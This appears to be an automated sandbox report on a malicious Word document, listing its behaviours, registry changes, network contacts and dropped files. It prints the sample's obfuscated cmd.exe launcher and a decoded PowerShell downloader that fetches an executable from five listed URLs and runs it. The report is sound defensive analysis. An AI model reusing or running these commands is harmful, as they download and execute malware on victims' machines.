Analysis Overview
SHA256
d89561784bc9cc81bce5a9918801420e466282f164f0a1d891c3ff27226072c6
Threat Level: Known bad
The file 60374b6b6af3002c0ece1e99d1da0be3_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Suspicious Office macro
Office macro that triggers on suspicious action
Blocklisted process makes network request
An obfuscated cmd.exe command-line is typically used to evade detection.
Drops file in Windows directory
Office loads VBA resources, possible macro or embedded object present
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Modifies registry class
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-20 17:03
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-20 17:03
Reported
2024-05-20 17:06
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SYSTEM32\CMd.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\CMd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4040 wrote to memory of 4212 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\CMd.exe |
| PID 4040 wrote to memory of 4212 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\CMd.exe |
| PID 4212 wrote to memory of 1904 | N/A | C:\Windows\SYSTEM32\CMd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4212 wrote to memory of 1904 | N/A | C:\Windows\SYSTEM32\CMd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\60374b6b6af3002c0ece1e99d1da0be3_JaffaCakes118.doc" /o ""
C:\Windows\SYSTEM32\CMd.exe
CMd /V:/C"^se^t -^@^$=-_\^ _/- ^\-_ /-\ /^-^_ \^-^_^ /\^_^ _/^\^ ^_/^\^ /-^\ /^-^_ /-^_^ -_^\ ^_/^\ ^\/^_ -\^_^ /^-_ ^-\^_}^-^\/}\/^-^{/_\^h\/^-c-_\^t^_-/a/^\_c/^_\^}/_-;-/^_^k\^_^-^a-\/^e/\-r^-_^\b^_/\;^-^_\j/^-^\^j\^_-^a/^_-$^_-\^ ^_^-^\^m\_/^e/_\^t^\/-I-\_-_^-\e^_^\/^k^\_^-^o/_^\v/\^-n-/\^I/_-^;\/^-)^_-/^j^_\/^j-/^_^a^-/\^$/_^\ /\_^,_\/^T^_/-N_/^\V^-\_$_/\(-/_^e_^-/l/\^_^i/^\^_^F^_\-^d_^\/a\/^-o/_^\l_/-n^-^\/w^-_^\^o^_-/D/\^-^._/^\T^\/^_o^\/^-S\-/$^-^_^\^{_/-y^-/^_r_\/^t^-_/{/_\)/-_^i\-/^z/^\^-b/^-\^$-^_/ \^_/n-/_^i/^\-^ /\-T^_^\/N^-_/V_/-$^\/-(^-_/h^\/^-c\/_^a\^_/e/\^-r^\_^-o^_/-^f-^_\;-^\_'^\/-e^\_/x^-^_\^e^-/_^./-^_'/^\^-+/^\-p/_-q-\/j-_^\$\_/^+/\-^'/^\^_\^_\/^'/^-^_^+^-^\^_c/_^-i/_^\l-/^_^b-\/u^\_^-^p^-^\^_^:-^\/v^_/\n^-/^_e/\-^$/_\^=/_-j^_\-j/-^_a_^\^-^$-_/;^-/\^'_^\/7/-^_^7^-\^_1_^\/'^_\/ /\_^=/^-_^ _/^\^p/\^_^q/^\^_^j^\^-^_$\/^_^;/-\)\/^-^'\^_-^@^\_/'-^_\(/^-^_^t^\_^-^i_^-^\l^_/-p^-^_\S/\^_.^-^\_'\-_^E\-/^7_/^-^4-_\e-/^_^e/^_-v/^-_U^_^-^\x\^-^_//\^-^g/^_^\r\/^-o_-/.\/^-^s^_^-^\e^\/_e^\/_r\/-^g\/^_^e/^-^\d/_^\^0-^\_^5-_^\^3^-/^_//-^_//^\-^:-/^\p^-/^\^t-/^_^t\/^-^h\-/^@^-\_m\^_-X-^\_^1/_\c-\_w^\^-_/\_^-^u\/^_r\^-_^.^-/\r^_/^-e-/\v-/\^t^\/^-^--\^_r-/_u^-/^_^t-^_/^1^_^\^-0^-/\0/\^_^1_/\//^_\/^\/^-^:/^-^\^p/_^-^t/^_\^t-_/h^\^_^-^@\^_/^b_^-^\n_\///^\^-n^_/^\v_^-/.^_^-\g/_^\n^\/^_^a_/^\r^_/^-^t\_^-^t-\/^a_/-^b_^-/^a^_-/^o^_^-\h^\/^-^h-^_/n/^_^-^i/^-\^t/_\//\^-/^-^_/^:/_^-^p-/^_^t_^\^-^t^\-/^h^_^\/^@^_^\^-^p-^_\X\^_^-c_^\/1\/-m^_-\E_/^\//_\g/^-^_r^-\/o^_^-/^.\^-^_^h^-/^_^a\/^_^m^\-_^t^-^_/^a\^_//^-^_\/^\^-_:-^_^\p^_^-/t/\^_t^-_^\h/^\-^@/-\p\-_R-_^\^6^\^-/E^\/^_v^_^\-^q-/_/^_/^-^m-_^\o-/^\c^_/^\./-^_x\/^_^u^-\/l^-^\^_^e_/-v^-_\^o^\/^_n/\_.^\^-^_e^-/\t/^\_^o/^-^\n_/\b-^\^_/\/-/^_^-/^:^-\/^p/\^-^t^\-/t^_^-\^h^\^_-^'/^_^\=-/_i^-^\_^z/_^\^b^-/\^$-/^_;-/^_^t^_\/n^-_/e^\/^_^i^\^_^-l/^_\C^_\^-^b_-/^e\/_^W^-^\/.^\-/t-/^_e^_^-/N^\/^_ -/\t-/_c^\_/^e/\-j-\^_^b^-\_^o-\_--\/w/^-_^e^_/^-n^_\^-=^_^-/^T^_/^-^o^_/^-^S\/_$\_^-^ ^\/^_l_^\-^l^\-/e^\^_^-^h\/^_^s\-^_r/^-\^e-/_w\-_o-/^_^p&&^f^or /L %n ^in (^14^1^9^,^-^4^,^3)^d^o ^s^et ^},^#=!^},^#!!-^@^$:~%n,1!&&^i^f %n ^eq^u ^3 c^al^l %^},^#:~-^35^5%"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $SoT=new-object Net.WebClient;$bzi='http://bnote.novelux.com/qvE6Rp@http://atmah.org/Em1cXp@http://tinhhoabattrang.vn/nb@http://1001tur-tver.ru/wc1Xm@http://350degrees.org/xUvee47E'.Split('@');$jqp = '177';$ajj=$env:public+'\'+$jqp+'.exe';foreach($VNT in $bzi){try{$SoT.DownloadFile($VNT, $ajj);Invoke-Item $ajj;break;}catch{}}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| GB | 52.109.32.7:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 7.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | bnote.novelux.com | udp |
| US | 8.8.8.8:53 | atmah.org | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| MY | 124.217.255.56:80 | atmah.org | tcp |
| US | 8.8.8.8:53 | tinhhoabattrang.vn | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.255.217.124.in-addr.arpa | udp |
| VN | 103.221.223.55:80 | tinhhoabattrang.vn | tcp |
| US | 8.8.8.8:53 | 1001tur-tver.ru | udp |
| US | 8.8.8.8:53 | 350degrees.org | udp |
| US | 8.8.8.8:53 | 55.223.221.103.in-addr.arpa | udp |
| US | 15.197.142.173:80 | 350degrees.org | tcp |
| US | 8.8.8.8:53 | 173.142.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.150.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| NL | 23.62.61.184:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 184.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/4040-2-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp
memory/4040-1-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp
memory/4040-0-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp
memory/4040-3-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp
memory/4040-4-0x00007FFD182CD000-0x00007FFD182CE000-memory.dmp
memory/4040-5-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-6-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp
memory/4040-7-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-9-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-8-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-10-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-11-0x00007FFCD5950000-0x00007FFCD5960000-memory.dmp
memory/4040-13-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-12-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-14-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-15-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-16-0x00007FFCD5950000-0x00007FFCD5960000-memory.dmp
memory/4040-18-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-17-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-36-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-39-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-42-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-43-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-41-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rhief4ap.egd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1904-49-0x0000029CDD1B0000-0x0000029CDD1D2000-memory.dmp
C:\Users\Public\177.exe
| MD5 | a5e197167c4d08ba5baa39d08cddf59d |
| SHA1 | 54ddc4027f9403eeacdac4f9b71fc242036abe02 |
| SHA256 | f81f7e140ffc288957822d9911b978dea75ed051f7ee2a3804f04d825039363d |
| SHA512 | df171f712895d940d9dc4599b877e5b22b05e8264ccea5ad9f8b614a432a2a002157a4bb667b5e29adfea0a3ed3a8af4adf51524bc3c17ce7df52c8748d4fe64 |
C:\Users\Public\177.exe
| MD5 | 76eba9e22b19a073a3c2b721cd0874e2 |
| SHA1 | f85e1822d4dbdb2f8b22ca08cb97438c66fd8a31 |
| SHA256 | de321060187c84623d6519cceff5983454c208de4af8579c64fc2dfde7736154 |
| SHA512 | e7012010413ce0a5302eb418745e5964ba87e2ae52d30aa8499ca2e3086496ee215f21362ae7b995907c577b13d2472d5510b2c943bdb560ebfa2233a9ad3abf |
C:\Users\Admin\AppData\Local\Temp\TCDA035.tmp\iso690.xsl
| MD5 | ff0e07eff1333cdf9fc2523d323dd654 |
| SHA1 | 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4 |
| SHA256 | 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5 |
| SHA512 | b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d |
memory/4040-540-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-559-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-560-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-561-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
memory/4040-581-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp
memory/4040-582-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp
memory/4040-584-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp
memory/4040-583-0x00007FFCD82B0000-0x00007FFCD82C0000-memory.dmp
memory/4040-585-0x00007FFD18230000-0x00007FFD18425000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-20 17:03
Reported
2024-05-20 17:06
Platform
win7-20240419-en
Max time kernel
121s
Max time network
121s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\CMd.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\CMd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
